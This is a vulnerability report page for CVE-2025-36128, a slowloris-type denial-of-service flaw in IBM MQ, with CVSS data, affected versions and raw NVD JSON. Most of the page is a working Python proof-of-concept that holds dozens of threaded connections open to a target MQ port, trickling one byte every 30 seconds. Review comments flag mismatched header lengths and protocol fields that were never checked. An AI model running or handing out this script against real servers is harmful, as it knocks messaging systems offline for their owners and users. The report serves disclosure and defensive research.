Security Vulnerability Report
CVE-2025-36128 CVSS 7.5 HIGH

CVE-2025-36128

Published: 2025-10-16 17:15:34
Last Modified: 2025-10-28 16:53:09

Description

IBM MQ 9.1, 9.2, 9.3, 9.4 LTS and 9.3, 9.4 CD is vulnerable to a denial of service, caused by improper enforcement of the timeout on individual read operations. By conducting slowloris-type attacks, a remote attacker could exploit this vulnerability to cause a denial of service.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:mq:9.1.0.0:*:*:*:lts:*:*:* - VULNERABLE
cpe:2.3:a:ibm:mq:9.2.0.0:*:*:*:lts:*:*:* - VULNERABLE
cpe:2.3:a:ibm:mq:9.3.0:*:*:*:continuous_delivery:*:*:* - VULNERABLE
cpe:2.3:a:ibm:mq:9.3.0.0:*:*:*:lts:*:*:* - VULNERABLE
cpe:2.3:a:ibm:mq:9.4.0:*:*:*:continuous_delivery:*:*:* - VULNERABLE
cpe:2.3:a:ibm:mq:9.4.0.0:*:*:*:lts:*:*:* - VULNERABLE
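Platform entries (in the raw JSON these operating systems are the "running on" side of the configuration, combined with the IBM MQ entries by AND; "NOT VULNERABLE" means the operating system is not itself the vulnerable component, not that IBM MQ installed on it is unaffected):
cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:ibm:i:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:oracle:solaris:-:*:*:*:*:*:*:* - NOT VULNERABLE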
IBM MQ 9.1 LTS
IBM MQ 9.2 LTS
IBM MQ 9.3 LTS
IBM MQ 9.4 LTS
IBM MQ 9.3 CD
IBM MQ 9.4 CD

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-36128 - IBM MQ Slow Read DoS PoC

Demonstrates the Slowloris-type condition described in the advisory: IBM MQ
not properly enforcing the timeout on individual read operations.

What the script puts on the wire, as written: it opens ``num_threads`` TCP
connections (optionally TLS-wrapped) to one host and port, writes one short
header on each, then writes a single zero byte every 30 seconds until it is
interrupted. No receive call appears anywhere in the script.

Defensive reading: every connection is long-lived and carries almost no
data, so the number of concurrent connections per source and the age and
throughput of each connection on the MQ port are the observable signals.
For fixed levels, see the vendor advisory referenced by the CVE record.
"""
import socket
import ssl
import time
import threading
import argparse
import sys  # NOTE(review): imported but not referenced in this script


class IBMMQSlowReadDoS:
    """Hold the settings for one run and drive the worker threads.

    Attributes set in ``__init__``:
        target_host, target_port: endpoint every worker connects to.
        num_threads: number of worker threads, one connection each.
        use_ssl: wrap each connection in TLS when true.
        channel: defaults to "SYSTEM.DEF.SVRCONN"; stored here but not read
            by any method in this script.
        sockets: initialised empty and never appended to in this script.
        running: flag polled by the worker loops and the main loop; cleared
            on Ctrl+C.
    """

    def __init__(self, target_host, target_port, num_threads=50, use_ssl=False, channel=None):
        self.target_host = target_host
        self.target_port = target_port
        self.num_threads = num_threads
        self.use_ssl = use_ssl
        self.channel = channel or "SYSTEM.DEF.SVRCONN"
        self.sockets = []
        self.running = True

    def create_socket(self):
        """Open one TCP connection to the configured host and port.

        Returns:
            The connected socket (TLS-wrapped when ``use_ssl`` is set), or
            None if any exception is raised; the error is printed, not
            propagated.
        """
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Socket timeout of 10 seconds, set before connecting.
            sock.settimeout(10)
            sock.connect((self.target_host, self.target_port))
            if self.use_ssl:
                context = ssl.create_default_context()
                # Hostname and certificate verification are both switched
                # off, so the peer is not authenticated by this client.
                context.check_hostname = False
                context.verify_mode = ssl.CERT_NONE
                sock = context.wrap_socket(sock, server_hostname=self.target_host)
            return sock
        except Exception as e:
            print(f"[ERROR] Failed to create socket: {e}")
            return None

    def send_mq_initial_header(self, sock):
        """Write the script's fixed opening bytes to ``sock``.

        The author describes this as a simplified initial handshake.

        NOTE(review): the length field is set to 40 (0x28) while 21 bytes
        are written in total. Field names and values are kept as published
        and are not checked here against the MQ wire format.
        """
        tsp_header = b'\x00\x00\x00\x28'  # Length: 40 bytes
        tsp_header += b'TSP '  # Protocol identifier
        tsp_header += b'\x01'  # Segment type: initial
        # Second structure, which the author labels MQIH (MQ Initial Header).
        mqih = b'\x00\x00\x00\x00'  # StrucId
        mqih += b'\x01\x00\x00\x00'  # Version
        mqih += b'\x00\x00\x00\x00'  # Reserved
        sock.send(tsp_header + mqih)

    def slow_read_attack(self, thread_id):
        """Hold one connection open and trickle single bytes over it.

        Args:
            thread_id: index used only to label this worker's log lines.

        NOTE(review): the name says "slow read", but this method only
        writes; the traffic it produces is one byte per 30 seconds per
        connection, which is the pattern a per-read timeout on the server
        side is meant to bound.
        """
        sock = self.create_socket()
        if not sock:
            return
        try:
            # Opening bytes are written once per connection.
            self.send_mq_initial_header(sock)
            print(f"[Thread {thread_id}] Connection established, starting slow read attack...")
            # From here the connection is kept open with minimal traffic.
            counter = 0
            while self.running:
                try:
                    # One zero byte, then a 30-second pause.
                    sock.send(b'\x00')
                    counter += 1
                    # Progress line every tenth byte sent.
                    if counter % 10 == 0:
                        print(f"[Thread {thread_id}] Connection alive, sent {counter} keep-alive bytes")
                    time.sleep(30)
                except socket.error:
                    # The peer or the network closed the connection; this
                    # worker ends and does not reconnect.
                    print(f"[Thread {thread_id}] Connection lost")
                    break
        except Exception as e:
            print(f"[Thread {thread_id}] Error: {e}")
        finally:
            # Best-effort close; any error while closing is ignored.
            try:
                sock.close()
            except:
                pass

    def launch_attack(self):
        """Start the worker threads and block until Ctrl+C.

        Workers are daemon threads started 0.1 seconds apart. On
        KeyboardInterrupt the ``running`` flag is cleared and the method
        waits 2 seconds before returning; workers sleep 30 seconds between
        checks of the flag, and daemon threads do not keep the process
        alive once the main thread finishes.
        """
        print(f"[*] Starting CVE-2025-36128 Slow Read DoS attack")
        print(f"[*] Target: {self.target_host}:{self.target_port}")
        print(f"[*] Threads: {self.num_threads}")
        print(f"[*] SSL: {self.use_ssl}")
        threads = []
        for i in range(self.num_threads):
            t = threading.Thread(target=self.slow_read_attack, args=(i,))
            t.daemon = True
            threads.append(t)
            t.start()
            time.sleep(0.1)  # Stagger connection creation
        print(f"[*] Attack launched with {self.num_threads} slow connections")
        print("[*] Press Ctrl+C to stop the attack")
        try:
            # The main thread only polls the flag once per second.
            while self.running:
                time.sleep(1)
        except KeyboardInterrupt:
            print("\n[*] Stopping attack...")
            self.running = False
            time.sleep(2)
            print("[*] Attack stopped")


if __name__ == "__main__":
    # Command-line entry point. The port defaults to 1414 and the thread
    # count to 50; the channel name is not exposed as an option, so the
    # class default is always used.
    parser = argparse.ArgumentParser(description='CVE-2025-36128 IBM MQ Slow Read DoS PoC')
    parser.add_argument('--host', required=True, help='Target IBM MQ host')
    parser.add_argument('--port', type=int, default=1414, help='Target port (default: 1414)')
    parser.add_argument('--threads', type=int, default=50, help='Number of attack threads (default: 50)')
    parser.add_argument('--ssl', action='store_true', help='Use SSL/TLS connection')
    args = parser.parse_args()
    dos = IBMMQSlowReadDoS(args.host, args.port, args.threads, args.ssl)
    dos.launch_attack()

References

https://www.ibm.com/support/pages/node/7244480 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36128", "sourceIdentifier": "[email protected]", "published": "2025-10-16T17:15:33.547", "lastModified": "2025-10-28T16:53:08.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM MQ 9.1, 9.2, 9.3, 9.4 LTS and 9.3, 9.4 CD is vulnerable to a denial of service, caused by improper enforcement of the timeout on individual read operations. By conducting slowloris-type attacks, a remote attacker could exploit this vulnerability to cause a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-772"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:mq:9.1.0.0:*:*:*:lts:*:*:*", "matchCriteriaId": "2E9E3A1B-D35D-4029-835C-C27917C2ABD7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:mq:9.2.0.0:*:*:*:lts:*:*:*", "matchCriteriaId": "AF700EBE-9E12-40AD-85B6-2B4C53514EC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:mq:9.3.0:*:*:*:continuous_delivery:*:*:*", "matchCriteriaId": "89BDCCFD-C1DF-4E19-8597-DF87C56D7E09"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:mq:9.3.0.0:*:*:*:lts:*:*:*", "matchCriteriaId": "574B92D2-A5C4-485F-AD8C-D82DC62CE5D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:mq:9.4.0:*:*:*:continuous_delivery:*:*:*", "matchCriteriaId": "FE929BED-85A5-42DB-AAA4-B3EB90A1231D"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:ibm:mq:9.4.0.0:*:*:*:lts:*:*:*", "matchCriteriaId": "060C8A17-3897-4A14-AECF-2222313FC61B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:*", "matchCriteriaId": "E492C463-D76E-49B7-A4D4-3B499E422D89"}, {"vulnerable": false, "criteria": "cpe:2.3:o:ibm:i:-:*:*:*:*:*:*:*", "matchCriteriaId": "C684FC45-C9BA-4EF0-BD06-BB289450DD21"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}, {"vulnerable": false, "criteria": "cpe:2.3:o:oracle:solaris:-:*:*:*:*:*:*:*", "matchCriteriaId": "91F372EA-3A78-4703-A457-751B2C98D796"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7244480", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}